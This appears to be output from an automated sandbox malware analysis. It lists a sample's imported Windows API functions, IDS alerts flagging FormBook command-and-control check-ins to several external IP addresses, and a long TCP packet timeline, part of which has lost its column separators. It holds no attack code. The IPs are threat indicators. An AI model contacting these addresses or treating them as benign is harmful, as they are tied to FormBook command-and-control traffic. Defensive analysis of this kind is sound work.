USER32.dll | CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
GDI32.dll | SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-11T10:09:08.800408+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49161 | 47.57.185.227 | 80 | TCP
2024-09-11T10:09:27.129558+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49166 | 89.58.49.1 | 80 | TCP
2024-09-11T10:09:58.325132+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49170 | 154.23.184.240 | 80 | TCP
2024-09-11T10:10:11.711785+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49174 | 85.159.66.93 | 80 | TCP
2024-09-11T10:10:25.063039+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49178 | 185.173.111.76 | 80 | TCP
2024-09-11T10:10:38.517261+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49182 | 203.161.43.228 | 80 | TCP
2024-09-11T10:10:51.794228+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49186 | 161.97.168.245 | 80 | TCP
2024-09-11T10:11:05.390377+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49190 | 172.96.191.39 | 80 | TCP
2024-09-11T10:11:18.744513+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49194 | 104.21.20.125 | 80 | TCP
2024-09-11T10:11:32.596650+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.22 | 49198 | 43.242.202.169 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 11, 2024 10:09:07.862241983 CEST | 49161 | 80 | 192.168.2.22 | 47.57.185.227
Sep 11, 2024 10:09:07.867805004 CEST | 80 | 49161 | 47.57.185.227 | 192.168.2.22
Sep 11, 2024 10:09:07.867985964 CEST | 49161 | 80 | 192.168.2.22 | 47.57.185.227
Sep 11, 2024 10:09:07.874480009 CEST | 49161 | 80 | 192.168.2.22 | 47.57.185.227
Sep 11, 2024 10:09:07.879874945 CEST | 80 | 49161 | 47.57.185.227 | 192.168.2.22
Sep 11, 2024 10:09:08.800055027 CEST | 80 | 49161 | 47.57.185.227 | 192.168.2.22
Sep 11, 2024 10:09:08.800116062 CEST | 80 | 49161 | 47.57.185.227 | 192.168.2.22
Sep 11, 2024 10:09:08.800407887 CEST | 49161 | 80 | 192.168.2.22 | 47.57.185.227
Sep 11, 2024 10:09:08.803030968 CEST | 49161 | 80 | 192.168.2.22 | 47.57.185.227
Sep 11, 2024 10:09:08.807971954 CEST | 80 | 49161 | 47.57.185.227 | 192.168.2.22
Sep 11, 2024 10:09:11.260441065 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.265423059 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.265491962 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.265733957 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.270541906 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771234035 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771295071 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771327019 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771356106 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771358967 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771409988 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771409988 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771410942 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771429062 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771462917 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771476984 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771497965 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771512032 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771532059 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771543026 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771568060 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771579981 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771601915 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.771614075 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.771648884 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.776653051 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.776689053 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.776726961 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.776741028 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.776741982 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.776771069 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.776786089 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.776818037 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857469082 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857517004 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857553005 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857556105 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857570887 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857599020 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857613087 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857647896 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857666969 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857681990 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857693911 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857717037 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857732058 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857753038 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.857759953 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.857800007 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.858422041 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.858458996 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.858468056 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.858495951 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.858501911 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.858529091 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.858537912 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.858563900 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.858573914 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.858604908 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859265089 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.859317064 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859328032 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.859375000 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859383106 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.859441042 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.859447956 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859477997 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.859486103 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859525919 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.859570980 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860212088 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860266924 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860291004 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860326052 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860342026 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860359907 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860369921 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860395908 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860405922 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860439062 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.860949993 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.860996008 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943645954 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943715096 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943752050 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943789005 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943824053 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943856955 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943871975 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943892956 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943926096 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943959951 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.943986893 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943986893 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943986893 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943988085 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943988085 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943988085 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943988085 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.943998098 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944040060 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944040060 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944710970 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944761038 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944777966 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944797039 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944804907 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944834948 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944860935 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944874048 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.944881916 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.944935083 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945108891 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945162058 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945169926 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945197105 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945214033 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945231915 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945254087 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945265055 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945272923 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945300102 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945316076 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945338964 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945878029 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945930958 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945939064 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.945966005 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.945983887 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946000099 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946023941 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946034908 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946043968 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946072102 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946091890 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946108103 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946130037 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946157932 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946741104 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946791887 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946799040 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946826935 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946845055 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946861982 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946887970 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946904898 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946938038 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946938992 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.946959019 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.946976900 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.947001934 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.947020054 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
Sep 11, 2024 10:09:11.947649002 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.947700977 CEST | 80 | 49162 | 45.33.6.223 | 192.168.2.22
Sep 11, 2024 10:09:11.947710037 CEST | 49162 | 80 | 192.168.2.22 | 45.33.6.223
                                        Sep 11, 2024 10:09:11.947736025 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947752953 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947771072 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947797060 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947805882 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947819948 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947839975 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947856903 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947875023 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.947895050 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.947930098 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.948884964 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.948919058 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:11.948945045 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:11.948978901 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.029851913 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.029925108 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.029961109 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030014038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030049086 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030072927 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030098915 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030134916 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030162096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030162096 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030169010 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030183077 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030214071 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030214071 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030261993 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030267954 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030323982 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030327082 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030360937 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030380964 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030417919 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030421972 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030452967 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030471087 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030494928 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030505896 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030539036 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030561924 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030575037 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030586004 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030610085 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030627966 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030644894 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030678034 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030678034 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030700922 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030711889 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030723095 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030745983 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030762911 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030777931 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030801058 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:09:12.030810118 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:09:12.030819893 CEST4916280192.168.2.2245.33.6.223
